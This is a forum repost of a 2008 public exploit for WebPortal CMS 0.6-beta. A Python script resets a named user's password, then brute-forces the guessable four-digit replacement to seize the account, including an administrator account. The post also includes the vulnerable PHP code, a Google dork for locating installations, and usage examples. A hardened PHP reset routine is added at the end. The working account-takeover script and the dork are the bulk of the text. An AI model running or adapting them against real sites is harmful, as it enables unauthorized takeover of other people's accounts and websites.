 WebPortal CMS 0.6-beta Remote Password Change Exploit

El-Fuego



Post subject: WebPortal CMS 0.6-beta Remote Password Change Exploit   Thu Jun 12, 2008 8:33 pm

#!/usr/bin/python
#=================================================================================================#
# This is a Public Exploit.
# Date: 04/01/2008 [dd,mm,yyyy]
#
# !!!Happy New Year!!!
#
#=================================================================================================#
# WebPortal-0.6-beta Cms And Maybe Lower Remote Password Change Exploit
#
# Vendor: webportal.ivanoculmine.com
# Severity: Highest
# Author: The:Paradox
#=================================================================================================#
# This exploit works with Magic Quotes = On
#=================================================================================================#
# Proud To Be Italian.
#=================================================================================================#
"""
Related Codes:

actions.php; line 14:

elseif ($_GET["action"] == "lostpass") {
    $newpass = date("is").substr($user, 1, 2);
    $result = db_query ("SELECT * FROM ".$prefix."users WHERE uname='".$_POST["user_name"]."';");
    if (db_num_rows($result) > 0) {
        $utente = db_fetch_array ($result);
        db_query ("UPDATE ".$prefix."users SET pass='".md5($newpass)."' WHERE id='".$utente["id"]."';");
"""
#=================================================================================================#
# Proof Of Concept / Bug Explanation:
#
# This vulnerability is in actions.php and make us able to change the password of a victim user.
# The page is a "Password Recovery Tool", that sends a new generated password to user's email.
# It does an Update query (after a vulnerable SQL injection mq = OFF xD) setting as "pass"
# the $newpass variable. Let's look the code.
#
# $newpass = date("is").substr($user, 1, 2);
#
# The newpassword is simply the date (minute+seconds) and the var $user taken through
# register_globals (we can let it empty).
# So look at your clock, recover the password, and get administrator rights ! =D
#
# If get the exactly server date is a problem for you, i have coded a little bruteforcer
# (the new password is a 4 number sequence).
#
#=================================================================================================#
# Post Request to "Recover Password" :
#
# POST /webportal-0.6-beta/actions.php?action=lostpass user_name=[UserName]
#
#=================================================================================================#
# WebPortal cms is a very bugged platform. Some pages and functions don't work with the server
# configuration Register_globals = Off , A LOT of sql injections with Magic Quotes = Off,
# Full path disclosures ecc.
# Whatever this one is the most critical ('cause works with Mq=ON).
# Maybe I'll public a sql injection mq=Off.
#=================================================================================================#
# Google Dork=> Realizzato utilizzando Web Portal
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.
#=================================================================================================#
# Python Exploit Starts
#=================================================================================================#
import httplib, urllib, sys
from string import replace

print "\n################################################"
print " WebPortal-0.6-beta Cms And Maybe Lower "
print " Remote Password Change Exploit "
print " Date Bruteforcer "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [Username] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /WebPortal/ Admin " % (sys.argv[0])
print " python %s www.host.com / Admin " % (sys.argv[0])
print " "
print " "
print "################################################\n"

if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."

port = "80"
target = sys.argv[1]
path = sys.argv[2]
username = sys.argv[3]

#Resetting Password
conn = httplib.HTTPConnection(target,port)
conn.request("POST", path + "actions.php?action=lostpass", urllib.urlencode({'user_name': username}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Resetting Password -->",response.status, response.reason
conn.close()

#If 404 error: die.
if response.status == 404: sys.exit("[-]Unable to reset Password. Failed, Exiting.")

#Let's Brute.
print "[.]Bruteforcer Starts. This may take long time."
for i in range(10000,19999):
    conn = httplib.HTTPConnection(target,port)
    conn.request("POST", path + "actions.php", urllib.urlencode({'uname': username,'pass': replace(str(i), "1", "", 1),"action" : "login"}), {"Accept": "text/plain","Content-Type": "application/x-www-form-urlencoded"})
    response = conn.getresponse()
    header = response.getheader("location")
    if header.find("index.php?error=not_logged") == -1: sys.exit("\n\n[+]Gotcha! Password is: " + replace(str(i), "1", "", 1) + "\n\n-=Paradox Got This One=-\n")

print "[-]Not Found. Exploit Failed."

# milw0rm.com [2008-01-04]
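
A hardened form of the `lostpass` branch quoted in the exploit header, as an added example that is not part of the original post or of WebPortal: the reset token comes from a CSPRNG, the query is parameterized, and the stored password changes only after the token is redeemed. The `password_resets` table and the function names `request_reset` and `complete_reset` are assumptions made for illustration.

```php
<?php
// Added example, not WebPortal code. Assumed schema: users(id, uname, pass) as in
// the quoted snippet, plus a hypothetical password_resets table.
declare(strict_types=1);

function request_reset(PDO $db, string $userName): ?string
{
    // Prepared statement: user_name is never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id FROM users WHERE uname = ?');
    $stmt->execute([$userName]);
    $id = $stmt->fetchColumn();
    if ($id === false) {
        return null; // caller should answer identically for unknown users
    }
    // 256 bits from the CSPRNG instead of date("is"), which has at most 3600 values.
    $token = bin2hex(random_bytes(32));
    $db->prepare('INSERT INTO password_resets (user_id, token_hash, expires_at) VALUES (?, ?, ?)')
       ->execute([$id, hash('sha256', $token), time() + 900]);
    return $token; // e-mailed to the account owner; users.pass is not touched here
}

function complete_reset(PDO $db, string $token, string $newPassword): bool
{
    $stmt = $db->prepare('SELECT user_id FROM password_resets WHERE token_hash = ? AND expires_at > ?');
    $stmt->execute([hash('sha256', $token), time()]);
    $id = $stmt->fetchColumn();
    if ($id === false) {
        return false;
    }
    $db->prepare('UPDATE users SET pass = ? WHERE id = ?')
       ->execute([password_hash($newPassword, PASSWORD_DEFAULT), $id]);
    $db->prepare('DELETE FROM password_resets WHERE user_id = ?')->execute([$id]); // single use
    return true;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, uname TEXT UNIQUE, pass TEXT)');
$db->exec('CREATE TABLE password_resets (user_id INTEGER, token_hash TEXT, expires_at INTEGER)');
$db->prepare('INSERT INTO users (uname, pass) VALUES (?, ?)')
   ->execute(['Admin', password_hash('original', PASSWORD_DEFAULT)]);

$token = request_reset($db, 'Admin');
var_dump(complete_reset($db, '0000', 'guess'));      // value in the old 4-digit format
var_dump(complete_reset($db, $token, 'new-secret')); // token issued above
var_dump(complete_reset($db, $token, 'again'));      // same token presented a second time
```

Because the account's password is only rewritten in `complete_reset`, an unauthenticated request to the reset endpoint can no longer lock out or take over a named user.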